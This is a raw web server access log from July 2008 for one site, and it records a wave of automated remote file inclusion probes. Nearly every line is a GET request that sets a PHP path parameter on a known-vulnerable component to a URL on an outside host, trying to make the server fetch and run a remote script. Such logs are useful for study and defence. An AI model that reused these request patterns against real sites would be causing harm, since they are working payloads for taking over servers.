72.249.29.43 - - [14/Jul/2008:09:42:30 -0700] "GET /logs/access_080329.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://bratki2.ovh.org/templates/rhuk_solarflare_ii/images/.know/.../idbot5.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.249.29.43 - - [14/Jul/2008:09:42:30 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://bratki2.ovh.org/templates/rhuk_solarflare_ii/images/.know/.../idbot5.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.249.29.43 - - [14/Jul/2008:09:42:30 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://bratki2.ovh.org/templates/rhuk_solarflare_ii/images/.know/.../idbot5.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.249.29.43 - - [14/Jul/2008:09:42:31 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://bratki2.ovh.org/templates/rhuk_solarflare_ii/images/.know/.../idbot5.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
87.98.222.137 - - [14/Jul/2008:09:42:37 -0700] "GET /logs/access_080329.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://bratki2.ovh.org/templates/rhuk_solarflare_ii/images/.know/.../idbot5.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.98.222.137 - - [14/Jul/2008:09:42:37 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://bratki2.ovh.org/templates/rhuk_solarflare_ii/images/.know/.../idbot5.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.98.222.137 - - [14/Jul/2008:09:42:37 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://bratki2.ovh.org/templates/rhuk_solarflare_ii/images/.know/.../idbot5.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.112.255.3 - - [14/Jul/2008:09:42:45 -0700] "GET /include/lib.inc.php?site_path=http://www.rostop.com/zerocool/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
212.112.255.3 - - [14/Jul/2008:09:42:45 -0700] "GET /logs/include/lib.inc.php?site_path=http://www.rostop.com/zerocool/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
217.151.102.50 - - [14/Jul/2008:09:42:52 -0700] "GET /logs//calendar.php?p=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.151.102.50 - - [14/Jul/2008:09:42:52 -0700] "GET //calendar.php?p=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.143.162 - - [14/Jul/2008:09:43:22 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://75.125.130.242/analmovies/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
75.125.143.162 - - [14/Jul/2008:09:43:23 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://75.125.130.242/analmovies/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
212.112.255.3 - - [14/Jul/2008:09:43:56 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.rostop.com/zerocool/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
212.112.255.3 - - [14/Jul/2008:09:43:56 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.rostop.com/zerocool/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
82.194.70.164 - - [14/Jul/2008:09:44:00 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.lisey.ca/sohoadmin/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.70.164 - - [14/Jul/2008:09:44:01 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.lisey.ca/sohoadmin/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.219.217.74 - - [14/Jul/2008:09:44:07 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.rostop.com/zerocool/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
213.219.217.74 - - [14/Jul/2008:09:44:07 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.rostop.com/zerocool/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
217.217.156.81 - - [14/Jul/2008:09:44:08 -0700] "GET /logs/access.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
217.217.156.81 - - [14/Jul/2008:09:44:08 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
87.98.222.137 - - [14/Jul/2008:09:44:11 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://bratki2.ovh.org/templates/rhuk_solarflare_ii/images/.know/.../idbot5.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.98.222.137 - - [14/Jul/2008:09:44:12 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://bratki2.ovh.org/templates/rhuk_solarflare_ii/images/.know/.../idbot5.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.70.164 - - [14/Jul/2008:09:44:15 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.70.164 - - [14/Jul/2008:09:44:15 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
92.75.213.114 - - [14/Jul/2008:09:44:31 -0700] "GET /logs/access.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.165.253.72 - - [14/Jul/2008:09:44:31 -0700] "GET /logs/access_080110.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://wegehaupt-berlin.de/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
92.75.213.114 - - [14/Jul/2008:09:44:31 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.165.253.72 - - [14/Jul/2008:09:44:31 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://wegehaupt-berlin.de/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.165.253.72 - - [14/Jul/2008:09:44:31 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://wegehaupt-berlin.de/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
92.75.213.114 - - [14/Jul/2008:09:44:31 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.219.217.74 - - [14/Jul/2008:09:44:37 -0700] "GET /include/lib.inc.php?site_path=http://www.rostop.com/zerocool/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
213.219.217.74 - - [14/Jul/2008:09:44:37 -0700] "GET /logs/include/lib.inc.php?site_path=http://www.rostop.com/zerocool/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
82.165.253.72 - - [14/Jul/2008:09:44:38 -0700] "GET /logs/access_071230.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://wegehaupt-berlin.de/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
41.204.195.212 - - [14/Jul/2008:09:44:38 -0700] "GET /logs/access_080329.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://bratki2.ovh.org/templates/rhuk_solarflare_ii/images/.know/.../idbot5.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
41.204.195.212 - - [14/Jul/2008:09:44:39 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://bratki2.ovh.org/templates/rhuk_solarflare_ii/images/.know/.../idbot5.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
41.204.195.212 - - [14/Jul/2008:09:44:40 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://bratki2.ovh.org/templates/rhuk_solarflare_ii/images/.know/.../idbot5.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.227.65.79 - - [14/Jul/2008:09:44:42 -0700] "GET /logs/access_080110.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.degorzen.nl/Joomla/mambots/editors/htmlarea2/popups/albid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.227.65.79 - - [14/Jul/2008:09:44:42 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.degorzen.nl/Joomla/mambots/editors/htmlarea2/popups/albid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.227.65.79 - - [14/Jul/2008:09:44:43 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.degorzen.nl/Joomla/mambots/editors/htmlarea2/popups/albid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
213.206.113.104 - - [14/Jul/2008:09:44:46 -0700] "GET /logs/access_080110.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://wegehaupt-berlin.de/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.206.113.104 - - [14/Jul/2008:09:44:47 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://wegehaupt-berlin.de/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.206.113.104 - - [14/Jul/2008:09:44:47 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://wegehaupt-berlin.de/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.65.79 - - [14/Jul/2008:09:44:57 -0700] "GET /logs/access_071230.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.degorzen.nl/Joomla/mambots/editors/htmlarea2/popups/albid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
61.47.2.136 - - [14/Jul/2008:09:44:57 -0700] "GET /logs/access_071224.log//skin/zero_vote/ask_password.php?dir=http://sv-hbc.nl/db/cgi/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.206.113.104 - - [14/Jul/2008:09:44:58 -0700] "GET /logs/access_071230.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://wegehaupt-berlin.de/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.47.2.136 - - [14/Jul/2008:09:45:00 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://sv-hbc.nl/db/cgi/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.47.2.136 - - [14/Jul/2008:09:45:03 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://sv-hbc.nl/db/cgi/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.206.113.104 - - [14/Jul/2008:09:45:06 -0700] "GET /logs/access_071218.log/?mosConfig_absolute_path=http://www.larisco.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.206.113.104 - - [14/Jul/2008:09:45:10 -0700] "GET /?mosConfig_absolute_path=http://www.larisco.com/id.txt?? HTTP/1.1" 200 18401 "-" "libwww-perl/5.805" "www.dmulk.com"
213.206.113.104 - - [14/Jul/2008:09:45:11 -0700] "GET /logs/?mosConfig_absolute_path=http://www.larisco.com/id.txt?? HTTP/1.1" 200 56136 "-" "libwww-perl/5.805" "www.dmulk.com"
213.206.113.104 - - [14/Jul/2008:09:45:12 -0700] "GET /logs/access_071219.log/?mosConfig_absolute_path=http://www.larisco.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.98.71 - - [14/Jul/2008:09:45:38 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.98.71 - - [14/Jul/2008:09:45:39 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.143.162 - - [14/Jul/2008:09:45:44 -0700] "GET /logs/errors.php?error=http://75.125.130.242/analmovies/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
75.125.143.162 - - [14/Jul/2008:09:45:45 -0700] "GET /errors.php?error=http://75.125.130.242/analmovies/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
194.143.183.8 - - [14/Jul/2008:09:45:52 -0700] "GET /logs/access_080315.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.249.29.43 - - [14/Jul/2008:09:45:57 -0700] "GET /logs/access_080212.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://bratki2.ovh.org/templates/rhuk_solarflare_ii/images/.know/.../idbot5.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.249.29.43 - - [14/Jul/2008:09:45:57 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://bratki2.ovh.org/templates/rhuk_solarflare_ii/images/.know/.../idbot5.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.249.29.43 - - [14/Jul/2008:09:45:57 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://bratki2.ovh.org/templates/rhuk_solarflare_ii/images/.know/.../idbot5.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.249.29.43 - - [14/Jul/2008:09:45:58 -0700] "GET /logs/access_080212.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://bratki2.ovh.org/templates/rhuk_solarflare_ii/images/.know/.../idbot5.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.249.29.43 - - [14/Jul/2008:09:45:58 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://bratki2.ovh.org/templates/rhuk_solarflare_ii/images/.know/.../idbot5.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.249.29.43 - - [14/Jul/2008:09:45:58 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://bratki2.ovh.org/templates/rhuk_solarflare_ii/images/.know/.../idbot5.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.109.76.232 - - [14/Jul/2008:09:46:03 -0700] "GET /logs/access_071230.log//bemarket/postscript/postscript.php?p_mode=http://hscu.de/page/bilder/schult_a102.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.109.76.232 - - [14/Jul/2008:09:46:03 -0700] "GET //bemarket/postscript/postscript.php?p_mode=http://hscu.de/page/bilder/schult_a102.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.109.76.232 - - [14/Jul/2008:09:46:04 -0700] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://hscu.de/page/bilder/schult_a102.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.98.222.137 - - [14/Jul/2008:09:46:26 -0700] "GET /logs/access_080212.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://bratki2.ovh.org/templates/rhuk_solarflare_ii/images/.know/.../idbot5.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.98.222.137 - - [14/Jul/2008:09:46:26 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://bratki2.ovh.org/templates/rhuk_solarflare_ii/images/.know/.../idbot5.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.98.222.137 - - [14/Jul/2008:09:46:26 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://bratki2.ovh.org/templates/rhuk_solarflare_ii/images/.know/.../idbot5.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.249.29.43 - - [14/Jul/2008:09:47:01 -0700] "GET /logs/access_080313.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://bratki2.ovh.org/templates/rhuk_solarflare_ii/images/.know/.../idbot5.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.249.29.43 - - [14/Jul/2008:09:47:01 -0700] "GET /logs/access_080313.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://bratki2.ovh.org/templates/rhuk_solarflare_ii/images/.know/.../idbot5.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
61.47.2.136 - - [14/Jul/2008:09:47:29 -0700] "GET /logs/access_071224.log//skin/zero_vote/ask_password.php?dir=http://sv-hbc.nl/db/cgi/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.165.253.72 - - [14/Jul/2008:09:47:30 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://wegehaupt-berlin.de/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.206.113.104 - - [14/Jul/2008:09:47:31 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://wegehaupt-berlin.de/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.93.48.162 - - [14/Jul/2008:09:47:32 -0700] "GET /logs/access_080313.log//calendar.php?s=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.93.48.162 - - [14/Jul/2008:09:47:32 -0700] "GET /logs/access_080313.log//calendar.php?s=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.93.48.162 - - [14/Jul/2008:09:47:32 -0700] "GET /logs//calendar.php?s=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.93.48.162 - - [14/Jul/2008:09:47:32 -0700] "GET /logs//calendar.php?s=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
61.47.2.136 - - [14/Jul/2008:09:47:33 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://sv-hbc.nl/db/cgi/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.47.2.136 - - [14/Jul/2008:09:47:35 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://sv-hbc.nl/db/cgi/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.98.71 - - [14/Jul/2008:09:47:55 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.98.71 - - [14/Jul/2008:09:47:56 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.98.222.137 - - [14/Jul/2008:09:48:11 -0700] "GET /logs/access_080313.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://bratki2.ovh.org/templates/rhuk_solarflare_ii/images/.know/.../idbot5.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.220 - - [14/Jul/2008:09:48:29 -0700] "GET /logs/include/libchart-1.1/libchart.php?tm_includepath=http://www.voipanywhere.pt/language/r0x.gif????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.220 - - [14/Jul/2008:09:48:30 -0700] "GET /include/libchart-1.1/libchart.php?tm_includepath=http://www.voipanywhere.pt/language/r0x.gif????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.220 - - [14/Jul/2008:09:48:44 -0700] "GET /logs/include/status_top_x.inc.php?tm_includepath=http://www.voipanywhere.pt/language/r0x.gif????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.220 - - [14/Jul/2008:09:48:44 -0700] "GET /include/status_top_x.inc.php?tm_includepath=http://www.voipanywhere.pt/language/r0x.gif????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.93.48.162 - - [14/Jul/2008:09:48:55 -0700] "GET /index.php5?lang=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.93.48.162 - - [14/Jul/2008:09:48:58 -0700] "GET /index.php5?lang=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
41.204.195.212 - - [14/Jul/2008:09:49:09 -0700] "GET /logs/access_080212.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://bratki2.ovh.org/templates/rhuk_solarflare_ii/images/.know/.../idbot5.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.219.212 - - [14/Jul/2008:09:49:09 -0700] "GET /logs/access_071224.log//modifyform.html?code=http://www.termotecnia.cl/mb/administrator/components/com_x-shop/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.219.212 - - [14/Jul/2008:09:49:09 -0700] "GET /logs/access_071224.log//modifyform.html?code=http://www.termotecnia.cl/mb/administrator/components/com_x-shop/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.219.212 - - [14/Jul/2008:09:49:10 -0700] "GET /logs/access_071224.log//modifyform.html?code=http://icqbomber.110mb.com/files/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.219.212 - - [14/Jul/2008:09:49:10 -0700] "GET /logs/access_071224.log//modifyform.html?code=http://icqbomber.110mb.com/files/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.219.212 - - [14/Jul/2008:09:49:10 -0700] "GET //modifyform.html?code=http://www.termotecnia.cl/mb/administrator/components/com_x-shop/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.219.212 - - [14/Jul/2008:09:49:10 -0700] "GET //modifyform.html?code=http://www.termotecnia.cl/mb/administrator/components/com_x-shop/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
41.204.195.212 - - [14/Jul/2008:09:49:10 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://bratki2.ovh.org/templates/rhuk_solarflare_ii/images/.know/.../idbot5.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.219.212 - - [14/Jul/2008:09:49:10 -0700] "GET /logs/access_071224.log//modifyform.html?code=http://icqbomber.110mb.com/files/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.219.212 - - [14/Jul/2008:09:49:10 -0700] "GET //modifyform.html?code=http://icqbomber.110mb.com/files/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.219.212 - - [14/Jul/2008:09:49:10 -0700] "GET //modifyform.html?code=http://icqbomber.110mb.com/files/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.219.212 - - [14/Jul/2008:09:49:10 -0700] "GET /logs//modifyform.html?code=http://www.termotecnia.cl/mb/administrator/components/com_x-shop/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.219.212 - - [14/Jul/2008:09:49:10 -0700] "GET /logs/access_071224.log//modifyform.html?code=http://icqbomber.110mb.com/files/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.219.212 - - [14/Jul/2008:09:49:10 -0700] "GET /logs//modifyform.html?code=http://www.termotecnia.cl/mb/administrator/components/com_x-shop/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.219.212 - - [14/Jul/2008:09:49:10 -0700] "GET /logs/access_071224.log//modifyform.html?code=http://www.termotecnia.cl/mb/administrator/components/com_x-shop/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.219.212 - - [14/Jul/2008:09:49:10 -0700] "GET //modifyform.html?code=http://icqbomber.110mb.com/files/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.219.212 - - [14/Jul/2008:09:49:10 -0700] "GET /logs//modifyform.html?code=http://icqbomber.110mb.com/files/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.219.212 - - [14/Jul/2008:09:49:10 -0700] "GET /logs//modifyform.html?code=http://icqbomber.110mb.com/files/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.219.212 - - [14/Jul/2008:09:49:10 -0700] "GET //modifyform.html?code=http://icqbomber.110mb.com/files/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
41.204.195.212 - - [14/Jul/2008:09:49:10 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://bratki2.ovh.org/templates/rhuk_solarflare_ii/images/.know/.../idbot5.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.219.212 - - [14/Jul/2008:09:49:11 -0700] "GET //modifyform.html?code=http://www.termotecnia.cl/mb/administrator/components/com_x-shop/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.219.212 - - [14/Jul/2008:09:49:11 -0700] "GET /logs//modifyform.html?code=http://icqbomber.110mb.com/files/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
